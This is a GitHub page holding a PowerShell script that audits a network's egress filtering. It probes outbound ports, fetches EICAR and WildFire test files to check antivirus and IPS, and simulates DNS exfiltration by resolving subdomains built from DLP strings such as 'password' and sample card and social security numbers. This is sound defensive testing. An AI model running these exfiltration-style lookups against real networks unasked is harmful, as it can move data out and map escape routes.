-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathPS-egress-enum.ps1
57 lines (43 loc) · 3.31 KB
/
PS-egress-enum.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#Egress Enumeration only via PSv3+ must run with Set-Execution -bypass in CLI for automation
#local admin required for trace capture
#Dennis Chow 05-Dec-2018
#Args
Param([string]$rhosts)
$timestamp = Get-Date -f yyyy-MM-dd_HH-mm-ss
$dports = @(80,443,8080,666,9090,1024)
$dlpStr = @("ssn", "password", "confidential", "4904-1510-3821-3872", "642-64-4761")
#Testing for firewall ports outbound
Write-Host "Testing egress filtering on different ports" -ForegroundColor Yellow -BackgroundColor Black
ForEach ($i in $dports)
{
Test-NetConnection -ComputerName "portquiz.net" -Port $i | Where-Object -Property TcpTestSucceeded -NotLike "False" | `
Format-Table ComputerName, RemoteAddress, RemotePort, TcpTestSucceeded | Tee-Object -FilePath "ps-enum-results.log" -Append
}
Write-Host "Egress ports Written to ps-enum-results.log" -ForegroundColor Green -BackgroundColor Black
Write-Host "Testing alt-DNS recursion and exfil with DLP chars" -ForegroundColor Yellow -BackgroundColor Black
Write-Host "Starting packet trace..." -ForegroundColor Green -BackgroundColor Black
#Replacement for Netsh
New-NetEventSession -Name "DNSExfil" -CaptureMode SaveToFile -LocalFilePath "DNSExfil.etl"
Add-NetEventPacketCaptureProvider -SessionName "DNSExfil" -Level 4 -CaptureType Physical -IpAddresses 1.1.1.1 -IpProtocols 6,17
ForEach ($i in $dlpStr)
{
Write-Host "Invoking Fake DNS TCP Port 53 Lookup to CloudFlare $i.xtecsystems.com"
Invoke-Command { nslookup -vc "$i.xtecsystems.com" 1.1.1.1}
}
Write-Host "Stopping packet trace..." -ForegroundColor Red -BackgroundColor Black
Write-Host "Trace written to: DNSExfil.etl" -ForegroundColor Green -BackgroundColor Black
Stop-NetEventSession -Name "DNSExfil"
Remove-NetEventSession -Name "DNSExfil"
#Testing IPS AV Policies Enforcement
Write-Host "Testing IPS AV enforcement with EICAR and WildFire..." -ForegroundColor Yellow -BackgroundColor Black
Write-Host "Testing SSL Channel PE and EICAR download" -ForegroundColor Yellow -BackgroundColor Black
Invoke-WebRequest -Uri "https://wildfire.paloaltonetworks.com/publicapi/test/pe" -PassThru -Verbose | Tee-Object -FilePath "ps-enum-results.log" -Append
Invoke-WebRequest -Uri "https://secure.eicar.org/eicar_com.zip" -PassThru -Verbose | Tee-Object -FilePath "ps-enum-results.log" -Append
Write-Host "Testing HTTP Channel PE and EICAR download" -ForegroundColor Yellow -BackgroundColor Black
Invoke-WebRequest -Uri "http://wildfire.paloaltonetworks.com/publicapi/test/pe" -Verbose | Tee-Object -FilePath "ps-enum-results.log" -Append
Invoke-WebRequest -Uri "http://2016.eicar.org/download/eicar_com.zip" -Verbose | Tee-Object -FilePath "ps-enum-results.log" -Append
Write-Host "Testing REST API Method of Grabbing Test PE Europe and US" -ForegroundColor Yellow -BackgroundColor Black
Invoke-RestMethod -Method Get -Uri "https://eu.wildfire.paloaltonetworks.com/publicapi/test/pe" -Verbose | Tee-Object -FilePath "ps-enum-results.log" -Append
Invoke-RestMethod -Method Get -Uri "https://wildfire.paloaltonetworks.com/publicapi/test/pe" -Verbose | Tee-Object -FilePath "ps-enum-results.log" -Append
Write-Host "Capturing ICMP traceroute" -ForegroundColor Yellow -BackgroundColor Black
Test-NetConnection -ComputerName microsoft.com -TraceRoute -Hops 16 -Verbose | Tee-Object -FilePath "ps-enum-results.log" -Append